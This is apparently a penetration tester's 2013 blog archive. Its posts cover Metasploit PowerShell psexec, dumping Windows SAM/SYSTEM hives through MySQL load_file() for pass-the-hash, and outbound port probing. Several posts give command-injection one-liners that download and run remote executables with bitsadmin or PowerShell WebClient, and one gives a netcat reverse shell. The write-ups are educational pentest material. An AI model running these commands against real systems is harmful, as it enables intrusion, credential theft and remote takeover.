Friday, July 19, 2013

Authenticated Metasploit Payloads via Powershell Psexec

I love powershell and in a windows environment, powershell is king. Add the ability to perform native code injection and sprinkle in some metasploit and the possibilities are endless. There is a really awesome collection of tools called Powersploit by @mattifestation . These are powershell scripts that take advantage of "features" of powershell to do some cool stuff.

@obscuresec is also a contributor to the powersploit project, and not too long ago he had a really cool blog post detailing one way to execute a meterpreter payload within a powershell process. I thought this idea was really cool so I decided to try and take a stab at writing a metasploit module that implements a slightly modified version of this technique.

Many times in a penetration test I find myself having valid credentials to a target machine, but my payload keeps getting busted when I try and upgrade my shell to meterpreter.

This module allows you to use metasploit's existing powershell encoded payloads, or you can specify a file to use that contains a powershell script (such as powersploit) that will be executed on the target machine within the powershell process using the LPATH variable.

At the very minimum, will need to set the LHOST, RHOST, ARCH, SMBUSER and SMBPASS variables.



And if all goes as planned...



Also we can see that the only thing spawned on the target machine is one powershell process:


You can find the module on github.

Tuesday, June 25, 2013

Pulling Windows Hashes Using MySQL

Heres the setup:

-Obtain access to a MySQL database
-Database user has privileges (including File privileges)
-MySQL database is running on a windows server 2003 OS
-Cannot compile a UDF (User Defined Function) to allow command execution via MySQL, as we have no shell access, only access to the database

What do we need to do? We need to move from the database to the OS. We need to compromise Windows accounts...

How are we going to do this?

Using the help from a Chinese site, that no longer seems to be up(...weird?), and quite a bit of googling, I found a way to pull binary files (most importantly SAM and SYSTEM backup files) from the underlying OS using MySQL's built-in load_file() function.

Here are the steps:

-Convert the binary file to hex
-Pull it off the machine using the database's load_file function
-Save it to a local file
-Convert the hex back into binary
-Yank hashes out of your perfectly good SAM file
-Happy dance

First we need to verify that we have FILE privileges on the target machine:


Now lets see if the machine has the backups of the SAM and SYSTEM files. On windows XP/2003, the backup files are in C:\windows\repair\.

If you can get to these files, you will see a bunch of junk output to the screen. Once the query finishes, it will look something like this:





So what? We can load the garbled data of the binary file into mysql right? Wrong.

First we need to modify our select statement to put the file contents into hex, we will do this with mysql's hex() function:


select hex(load_file('c:/windows/repair/SAM'));


We also need to dump the results to a text file on our local system to that we can work with it. After some basic googling I made a quick python script to do this for me. You can find it here. *Note you will need to edit my script.

Now that we have our hex-encoded SAM and SYSTEM files on our attacking machine we need to convert the file contents back into binary. I found an awesome perl script to do exactly that here (thanks Dr. Herong Yang :) ).


perl hex2bin.pl SAM.txt SAM
perl hex2bin.pl SYSTEM.txt SYSTEM

We should now have a perfectly usable SAM and SYSTEM binary file. We can now try to pull the hashes with bkhive and samdump2 (there are other tools like cain, etc to do this as well)


Now pass that hash, and if the admin has been lazy, you will be able to login.


Voilà



Friday, June 7, 2013

Retrieving Elusive Command Output part 2

I can retrieve files using the same method as.... Windows Update??

In an earlier post, I described one possible way to upgrade a blind, command execution vulnerability to an interactive shell using only native windows commands. In this post I will ultimately accomplish the same goal, just in a different way using the same method that windows update uses to pull files, a tool called bitsadmin.

This is not a new idea, as it has been documented elsewhere (I think @mubix and @carnal0wnage might have mentioned it at Derbycon), but it just sparked my interest after I saw a tweet from @brutelogic, so I wanted to do a quick write up on it.

We will use the same scenario as the previous post, a vulnerable web application where we have confirmed command injection (via ping/DNS etc) but are unable to view our command output.

Once we have generated/selected the executable to be downloaded, we will need to serve it on our attacking machine.We will inject the command the same way as before:

127.0.0.1 | cmd.exe /c bitsadmin /transfer booyah http://192.168.2.105/boom.exe c:\%homepath%\boom.exe & c:\%homepath%\boom.exe

"booyah" is simply the bitsadmin job name and then we provide the command the location of the file to grab, followed by where to save the file and what to save it as. I use the %homepath% variable to be sure the user we are running as has permissions to write to the folder. We then append the command to execute the file as well.

**note that bitsadmin need a full path when you provide the location to save the file or else it will throw an error.

Once the transfer has completed, our payload executes and...



Booyah.

Friday, April 26, 2013

Quickly Determine Allowed Outbound Ports

I recently had a co-worker who needed to quickly determine the ports that were allowed outbound on a network. After some research, I stumbled upon @mubix 's awesome creation, being www.letmeoutofyour.net.

Using iptables and some apache-fu, he created a machine that will answer on each port that is connected to. This is nothing new, I just simply wanted to share a couple quick ways to find open outbound ports using native command shells and letmeoutofyour.net.

**Update: mubix has shut down letmeoutofyour.net (sadface). I have now modified the scripts to work with another site that does the same thing (open.zorinaq.com).


Windows

Powershell:

**Update: After talking with @mubix, I have rewritten this to reduce potential false positive scenarios associated with pre-routing/proxies

$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://open.zorinaq.com:$_"); req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); $stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() | select-string "Yep"){echo "$_ Allowed out"}}

Cmd.exe (using netcat):

for /L %i in (1,1,1024) do @nc.exe -z -v open.zorinaq.com %i | findstr "Yep"


Linux


Bash (using netcat):

for ((i=1; i<1024; i++)) do nc -z -v open.zorinaq.com $i | grep "Yep"; done

Python:
import urllib2;
for x in range (1,1024):
        url = "http://open.zorinaq.com:%d" % x;
        try:
                r = urllib2.urlopen(url, timeout=1);
                print "Port: %d" %x; print "Result: ",r.read();
        except urllib2.URLError, err:
                print "Port: %d" %x; print "Result: Refused";

Wednesday, March 6, 2013

Retrieving Elusive Command Output

I have found myself on multiple pentests recently where I needed to retrieve (blind) command output from a remote machine. Blind remote command execution by itself is great, and you can do many evil thing to a machine without even having to view the output, but usually at some point during the attack lifecycle you will need to view command output (for example data exfiltration/shell upgrade). This post will assume the following things:

-Blind remote command execution has been verified (via icmp or some other method)
-You are attacking a web application
-You are attacking a windows host
-You wish to use native Window$ programs so you dont have to upload anything(more noise)

 The most common way to retrieve blind command output would be through FTP. This method works great, but for the sake of learning multiple ways to accomplish this I wanted a second way to view this command ouput. Our goal will be to upgrade to an interactive command prompt, allowing us to view command output.

Here is the setup:

Victim Machine: Win7 running DVWA (192.168.1.101)
Attacker Machine: Backtrack (192.168.1.107)

For this post, we will use to command execution vulnerability within DVWA as our initial "blind" command execution. I realize DVWA by default spits the cmd output back to you, but you can edit the PHP source code (and learn some more in the process) to make this a truly blind attack.

We will use the following payload to exploit the vulnerability:

127.0.0.1 | whoami

Now that we have established blind command execution, we need to use another tool native to Windows to grab a file for us. When it comes to Windows I do most things with Powershell, and have found a renewed love for it thanks to the awesome work from @mattifestation and @obscuresec with the PowerSploit project. Thus I wanted to use it to accomplish my goals. I needed a one-line Powershell command that would work similar to wget for linux. After some research, I came across this blog post that gave me what I needed. It goes something like this:

(new-object System.Net.WebClient).Downloadfile("http://attacker.com
/test.txt", "test.txt")

This command creates a new COM object for the System.Net.Webclient class and then uses the DownloadFile method passing it two parameters:
1) The location and name of the file you want to download
2) Where/what name you want to save it as on the local machine

Once I confirmed this command would reach out to my server, I put a netcat binary into the webserver root. 

Using this command (after modifying the quotes) and invoking the powershell.exe binary, I was able to pull netcat from my machine. The full command to the web application resulted in this:

127.0.0.1 | powershell.exe (new-object System.Net.WebClient).Downloadfile('http://192.168.1.107/nc.exe', 'nc.exe')



Then, once the command completed, I set up a netcat listener on my attacker machine and issued a second command to the web application to push a shell back to my attacker machine via netcat:

127.0.0.1 | nc.exe -e cmd.exe 192.168.1.107 21


In this post we used Powershell to go from blind/1-way command execution to an interactive windows shell allowing us to retrieve command output.

If you know of other ways to retrieve blind command execution output using native windows tools, please feel free to discuss in the comments.